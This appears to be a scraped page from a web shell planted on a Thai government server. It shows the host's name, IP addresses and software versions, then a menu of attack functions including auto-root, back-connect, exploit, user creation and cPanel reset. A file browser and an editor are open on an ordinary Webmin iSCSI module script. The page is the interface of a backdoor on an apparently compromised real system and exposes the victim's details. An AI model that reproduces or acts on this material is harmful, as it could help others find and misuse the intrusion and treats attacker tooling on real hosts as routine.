Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
libexec /
webmin /
iscsi-server /
[ HOME SHELL ]
Name
Size
Permission
Action
help
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
CHANGELOG
106
B
-rw-r--r--
atboot.cgi
906
B
-rwxr-xr-x
backup_config.pl
672
B
-rwxr-xr-x
config
192
B
-rw-r--r--
config-freebsd
179
B
-rw-r--r--
config.info
238
B
-rw-r--r--
config.info.ca
294
B
-rw-r--r--
config.info.ca.UTF-8
298
B
-rw-r--r--
config.info.de
265
B
-rw-r--r--
config.info.de.UTF-8
265
B
-rw-r--r--
config.info.no
258
B
-rw-r--r--
config.info.no.UTF-8
258
B
-rw-r--r--
delete_devices.cgi
1.43
KB
-rwxr-xr-x
delete_extents.cgi
1.43
KB
-rwxr-xr-x
delete_targets.cgi
1.15
KB
-rwxr-xr-x
delete_users.cgi
805
B
-rwxr-xr-x
edit_device.cgi
1.79
KB
-rwxr-xr-x
edit_extent.cgi
3.11
KB
-rwxr-xr-x
edit_manual.cgi
601
B
-rwxr-xr-x
edit_opts.cgi
1002
B
-rwxr-xr-x
edit_target.cgi
2.09
KB
-rwxr-xr-x
edit_user.cgi
1.28
KB
-rwxr-xr-x
index.cgi
1.72
KB
-rwxr-xr-x
install_check.pl
348
B
-rwxr-xr-x
iscsi-server-lib.pl
12.22
KB
-rw-r--r--
list_devices.cgi
1.25
KB
-rwxr-xr-x
list_extents.cgi
1.16
KB
-rwxr-xr-x
list_targets.cgi
1.41
KB
-rwxr-xr-x
list_users.cgi
994
B
-rwxr-xr-x
log_parser.pl
677
B
-rwxr-xr-x
module.info
214
B
-rw-r--r--
module.info.ca
148
B
-rw-r--r--
module.info.ca.UTF-8
161
B
-rw-r--r--
module.info.de
134
B
-rw-r--r--
module.info.de.UTF-8
146
B
-rw-r--r--
module.info.ms_MY
150
B
-rw-r--r--
module.info.ms_MY.UTF-8
162
B
-rw-r--r--
module.info.no
122
B
-rw-r--r--
module.info.no.UTF-8
134
B
-rw-r--r--
restart.cgi
302
B
-rwxr-xr-x
save_device.cgi
1.91
KB
-rwxr-xr-x
save_extent.cgi
2.4
KB
-rwxr-xr-x
save_manual.cgi
403
B
-rwxr-xr-x
save_opts.cgi
1.09
KB
-rwxr-xr-x
save_target.cgi
1.8
KB
-rwxr-xr-x
save_user.cgi
1.01
KB
-rwxr-xr-x
start.cgi
279
B
-rwxr-xr-x
stop.cgi
254
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : edit_opts.cgi
#!/usr/bin/perl # Show a form for editing command-line options use strict; use warnings; require './iscsi-server-lib.pl'; our (%text, %config); &ui_print_header(undef, $text{'opts_title'}, ""); my $opts = &get_iscsi_options(); print &ui_form_start("save_opts.cgi"); print &ui_table_start($text{'opts_header'}, undef, 2); # IPv4 / 6 mode print &ui_table_row($text{'opts_ip4'}, &ui_yesno_radio("ip4", defined($opts->{'4'}))); print &ui_table_row($text{'opts_ip6'}, &ui_yesno_radio("ip6", defined($opts->{'6'}))); # Hostname print &ui_table_row($text{'opts_name'}, &ui_opt_textbox("name", $opts->{'t'}, 30, $text{'opts_namedef'})); # Port number print &ui_table_row($text{'opts_port'}, &ui_opt_textbox("port", $opts->{'p'}, 5, $text{'default'}." (3260)")); # Max sessions print &ui_table_row($text{'opts_sess'}, &ui_opt_textbox("sess", $opts->{'s'}, 5, $text{'default'})); print &ui_table_end(); print &ui_form_end([ [ undef, $text{'save'} ] ]); &ui_print_footer("", $text{'index_return'});
Close